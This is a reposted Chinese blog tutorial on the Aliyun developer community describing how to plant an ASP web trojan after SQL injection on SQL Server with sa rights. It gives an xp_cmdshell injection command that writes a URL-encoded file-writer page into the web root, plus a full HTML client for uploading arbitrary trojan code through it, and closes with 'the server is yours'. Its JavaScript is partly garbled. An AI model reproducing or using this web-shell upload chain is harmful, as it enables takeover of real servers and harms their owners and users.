开发者社区> 技术小甜> 正文
阿里云
为了无法计算的价值
打开APP
阿里云APP内打开

SQL注入与ASP木马上传的又一思路

简介:
+关注继续查看
本文适合有sa权限sqlserver数据库、并且能sql注入支持fso+asp的服务器 
  SQL注入后,如何上传木马,一直是比较头疼的事,我这里提供上传木马的一种另一种方法。
  1、SQL注入的时候,用xp_cmdshell 向服务器上写入一个能写文件的asp文件。
  文件内容:
<%
Set objFSO = Server.CreateObject("Scripting.FileSystemObject")
Set objCountFile=objFSO.CreateTextFile(request("mypath"),True)
objCountFile.Write request("mydata")
objCountFile.Close
%>
这个文件可以写成一行 <%Set objFSO = Server.CreateObject("Scripting.FileSystemObject"):Set objCountFile=objFSO.CreateTextFile(request("mypath"),True):objCountFile.Write request("mydata"):objCountFile.Close%>

将特殊字符进行编码   就可以得到 %3C%25Set%20objFSO%20=%20Server.CreateObject(%22Scripting.FileSystemObject%22):Set%20objCountFile=objFSO.CreateTextFile(request(%22mypath%22),True):objCountFile.Write%20request(%22mydata%22):objCountFile.Close%25%3E

注入(这里假定web目录是C:\Inetpub\wwwroot\): 
exec master..xp_cmdshell 'echo "%3C%25Set%20objFSO%20=%20Server.CreateObject(%22Scripting.FileSystemObject%22):Set%20objCountFile=objFSO.CreateTextFile(request(%22mypath%22),True):objCountFile.Write%20request(%22mydata%22):objCountFile.Close%25%3E" > C:\Inetpub\wwwroot\ftp.asp';

这样 在服务器的web 目录下 将生成一个 ftp.asp文件
该文件的代码为
<%
Set objFSO = Server.CreateObject("Scripting.FileSystemObject")
Set objCountFile=objFSO.CreateTextFile(request("mypath"),True)
objCountFile.Write request("mydata")
objCountFile.Close
%>
你可以看到,上面代码中预留了两个接口 mypath   和 mydata

mypath是下次提交的时候 文件的生成路径
mydata是文件的内容

在本地编写一个客户端文件 例:RohuClient.htm   代码如下

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title>肉鸡文件生成器--客户端   制作:绝对零度 QQ:12216796</title>
<style type="text/css">
<!--
TD {
FONT-SIZE: 9pt; LINE-HEIGHT: 150%
}
BODY {
FONT-SIZE: 12px;
FONT-FAMILY: Verdana, Arial, Helvetica, sans-serif, 宋体;
SCROLLBAR-FACE-COLOR: #eeeeee; 
SCROLLBAR-HIGHLIGHT-COLOR: #ffffff; 
SCROLLBAR-SHADOW-COLOR: #dee3e7; 
SCROLLBAR-3DLIGHT-COLOR: #d1d7dc; 
SCROLLBAR-ARROW-COLOR: #006699; 
SCROLLBAR-TRACK-COLOR: #ededed; 
SCROLLBAR-DARKSHADOW-COLOR: #98aab1
}

A:link {
FONT-SIZE: 9pt; COLOR: #363636; LINE-HEIGHT: 18px; TEXT-DECORATION: none
}
A:visited {
FONT-SIZE: 9pt; COLOR: #363636; LINE-HEIGHT: 18px; TEXT-DECORATION: none
}
A:hover {
COLOR: #cc0000; LINE-HEIGHT: 18px; TEXT-DECORATION: underline
}
input,select,TEXTAREA {
font-family: "tahoma", "arial", "helvetica", "sans-serif", "宋体";
background-color: #f9f9f9; 
font-size: 9pt ; 
border: 1px #d2d2d2 dobble;
line-height:120%;
}

-->
</style>
</head>
<script language="javascript" type="text/javascript">
function chk(theform)
{
if(theform.ftpUrl.value="http://blog.77169.com/='')
{
alert('请输入递交的地址!');
theform.ftpUrl.focus();
return" false;
}
if(theform.MyPath.value="http://blog.77169.com/='')
{
alert('请输入生成文件的位置!');
theform.MyPath.focus();
return" false;
}
if(theform.MyData.value="http://blog.77169.com/='')
{
alert('请输入生成文件的内容!');
theform.MyData.focus();
return" false;
}
theform.action=theform.ftpUrl.value;
}
</script>
<body>
<form name="RohuForm" method="post" action="" onSubmit="return chk(this)" target="_blank">
<table width="673" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
  <td width="11%">目标位置:</td>
  <td width="79%"><input name="ftpUrl" type="text" id="ftpUrl" size="50">
    例:
[url]http://127.0.0.1/FTP.ASP<;/td>[/url]
  </tr>
<tr>
  <td>生成文件:</td>
  <td><input name="MyPath" type="text" id="MyPath">
    将在服务器上,生成的文件路径。例:
C:\Inetpub\wwwroot\Server.asp </td>
  </tr>
<tr>
  <td valign="top">文件代码:</td>
  <td><textarea name="MyData" cols="100" rows="10" id="textarea"></textarea></td>
  </tr>
<tr>
  <td> </td>
  <td><input type="submit" name="Submit" value="提交"></td>
  </tr>
</table>
<br>
</form>
<table width="100%" border="0" cellspacing="0" cellpadding="0">
<tr>
  <td align="center">版权所有:绝对零度(<a href="
[url]http://www.rohu.com[/url]";>虎盟</a>)</td>
</tr>
</table>
</body>
</html>

在目标位置栏填上刚刚生成的ftp.asp文件的url地址 
如 
[url]http://127.0.0.1/ftp.asp[/url]   (这里假设服务器的ip是 127.0.0.1)
在生成文件栏   输入将在服务器上生成的文件名 比如:C:\Inetpub\wwwroot\Server.asp 
在文件内容里 ,随意的粘贴一个asp代码   
点递交,当
[url]http://127.0.0.1/ftp.asp[/url] 文件执行完毕   基本上服务器上的asp木马就生成了。

浏览 [url]http://127.0.0.1/Server.ASP[/url]   呵呵 服务器就是你的了。

















本文转自loveme2351CTO博客,原文链接:http://blog.51cto.com/loveme23/8528 ,如需转载请自行联系原作者


版权声明:本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《阿里云开发者社区用户服务协议》和《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。

相关文章
【大数据系列之JDBC】(五):使用PrepareStatement防止SQL注入
【大数据系列之JDBC】(五):使用PrepareStatement防止SQL注入
0 0
【大数据系列之JDBC】(四):Statement存在SQL注入问题
【大数据系列之JDBC】(四):Statement存在SQL注入问题
0 0
SQL注入笔记记录+MySQL的事务隔离级别
(一)SQL注入。 1.如何理解SQL注入? SQL注入是一种将SQL代码添加到输入参数中,传递到SQL服务器解析并执行的一种攻击手法。 2.SQL注入是如何产生的?
0 0
MySql基础-笔记12 -重复数据处理、SQL注入、导入导出数据
MySql基础-笔记12 -重复数据处理、SQL注入、导入导出数据
0 0
php操作mysql防止sql注入(合集)
php操作mysql防止sql注入(合集)
0 0
4 SQL注入盲注
所谓的盲注就是在服务器没有错误回显的时候完成的注入攻击。 服务器没有错误回显,对于攻击者来说缺少了非常重要的“调试信息”。
0 0
【工具】sql注入的基本原理与sqlmap的简单使用
本文将介绍超重量级工具SQLMAP的使用,我们将从OSCP经典教材出发,以视频的方式为您讲解其原理,此外我们将常用命令加以整理,为您奉上。
0 0
sql注入详解-01
前言 本文主要记录之前在portswigger官方网站学习时的一些细节; 在不同的情况下会出现各种各样的SQL注入漏洞、攻击和技术。一些常见的SQL注入示例包括: 检索隐藏的数据,可以在其中修改SQL查询以返回其他结果。(就是能够查到其他的正常情况下你没有权限的看到的结果) 颠覆应用程序逻辑,你可以改变一个查询来干扰应用程序的逻辑。 联合攻击,可以从不同的数据库表检索数据。 检查数据库,从中可以提取关于数据库版本和结构的信息。 盲SQL注入,应用程序的响应中不返回你控制的查询结果。
0 0
sql注入详解-02
前言 在利用SQL注入漏洞时,通常需要收集数据库本身的一些信息。这包括数据库软件的类型和版本,以及数据库所包含的表和列的内容。
0 0
+关注
文章
问答
文章排行榜
最热
最新
相关电子书
更多
用SQL做数据分析
立即下载
阿里云流计算 Flink SQL 核心功能解密
立即下载
Comparison of Spark SQL with Hive
立即下载